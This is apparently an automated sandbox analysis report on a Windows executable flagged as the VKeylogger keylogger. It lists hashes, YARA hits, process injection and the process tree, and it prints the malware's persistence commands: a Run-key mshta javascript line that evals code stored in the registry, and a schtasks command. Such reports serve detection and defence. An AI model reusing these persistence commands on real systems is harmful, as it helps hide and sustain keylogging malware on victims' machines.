Analysis
-
max time kernel
72s -
max time network
152s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
09-09-2021 07:24
Static task
static1
Behavioral task
behavioral1
Sample
9e559c854f7b4c66ffbe7702e8f49cd0.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
9e559c854f7b4c66ffbe7702e8f49cd0.exe
Resource
win10-en
General
-
Target
9e559c854f7b4c66ffbe7702e8f49cd0.exe
-
Size
154KB
-
MD5
9e559c854f7b4c66ffbe7702e8f49cd0
-
SHA1
cd28198ef48a50b3d14dc8eb5d37f505b2c85c33
-
SHA256
7004285faaa3caabec19f6382f86f380da6fbe1eb5d624a7bc2a9e999a5ba79d
-
SHA512
c2c751b71a3b7a2bcade9d59b7071ee4af5f239be4fd2075fb2a4d6bfa23ca1edde4083f0a0aafb578bc1161e5ec5b34587f2596b20309d9541c35df67585e89
Malware Config
Signatures
-
VKeylogger
A keylogger first seen in Nov 2020.
-
VKeylogger Payload 3 IoCs
resource yara_rule behavioral1/memory/1608-60-0x0000000000020000-0x000000000002E000-memory.dmp family_vkeylogger behavioral1/memory/1608-61-0x0000000000400000-0x0000000002144000-memory.dmp family_vkeylogger behavioral1/memory/1848-66-0x0000000000080000-0x000000000008F000-memory.dmp family_vkeylogger -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 1788 133.exe 1864 6E0302BCB0101291311131.exe -
Loads dropped DLL 4 IoCs
pid Process 1848 explorer.exe 1848 explorer.exe 1848 explorer.exe 1848 explorer.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Windows\\system32\\mshta.exe javascript:x=new%20ActiveXObject(\"wscript.shell\");v=x.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\SMSvcHost\\\\ComponentID\");eval(v);" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nfnur = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9e559c854f7b4c66ffbe7702e8f49cd0.exe" explorer.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\0Ep9c\qx5ow97Y 6E0302BCB0101291311131.exe File created C:\Windows\SysWOW64\knRwIY3Bz\5LqlvOPDt1v\iS6oc 6E0302BCB0101291311131.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1608 set thread context of 1848 1608 9e559c854f7b4c66ffbe7702e8f49cd0.exe 29 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1432 schtasks.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1608 9e559c854f7b4c66ffbe7702e8f49cd0.exe 1848 explorer.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1848 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1848 explorer.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1608 wrote to memory of 1848 1608 9e559c854f7b4c66ffbe7702e8f49cd0.exe 29 PID 1608 wrote to memory of 1848 1608 9e559c854f7b4c66ffbe7702e8f49cd0.exe 29 PID 1608 wrote to memory of 1848 1608 9e559c854f7b4c66ffbe7702e8f49cd0.exe 29 PID 1608 wrote to memory of 1848 1608 9e559c854f7b4c66ffbe7702e8f49cd0.exe 29 PID 1848 wrote to memory of 1788 1848 explorer.exe 32 PID 1848 wrote to memory of 1788 1848 explorer.exe 32 PID 1848 wrote to memory of 1788 1848 explorer.exe 32 PID 1848 wrote to memory of 1788 1848 explorer.exe 32 PID 1788 wrote to memory of 976 1788 133.exe 33 PID 1788 wrote to memory of 976 1788 133.exe 33 PID 1788 wrote to memory of 976 1788 133.exe 33 PID 1788 wrote to memory of 976 1788 133.exe 33 PID 976 wrote to memory of 1432 976 cmd.exe 35 PID 976 wrote to memory of 1432 976 cmd.exe 35 PID 976 wrote to memory of 1432 976 cmd.exe 35 PID 976 wrote to memory of 1432 976 cmd.exe 35 PID 2016 wrote to memory of 1864 2016 taskeng.exe 38 PID 2016 wrote to memory of 1864 2016 taskeng.exe 38 PID 2016 wrote to memory of 1864 2016 taskeng.exe 38 PID 2016 wrote to memory of 1864 2016 taskeng.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\9e559c854f7b4c66ffbe7702e8f49cd0.exe"C:\Users\Admin\AppData\Local\Temp\9e559c854f7b4c66ffbe7702e8f49cd0.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"2⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Users\Admin\AppData\Local\Temp\133.exe"C:\Users\Admin\AppData\Local\Temp\133.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /tn \6E0302BCB0101291311131 /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\6E0302BCB0101291311131\6E0302BCB0101291311131.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f4⤵
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \6E0302BCB0101291311131 /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\6E0302BCB0101291311131\6E0302BCB0101291311131.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f5⤵
- Creates scheduled task(s)
PID:1432
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {2D328B8F-FB7D-404D-AFC3-2248255F6BA2} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\6E0302BCB0101291311131\6E0302BCB0101291311131.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\6E0302BCB0101291311131\6E0302BCB0101291311131.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1864
-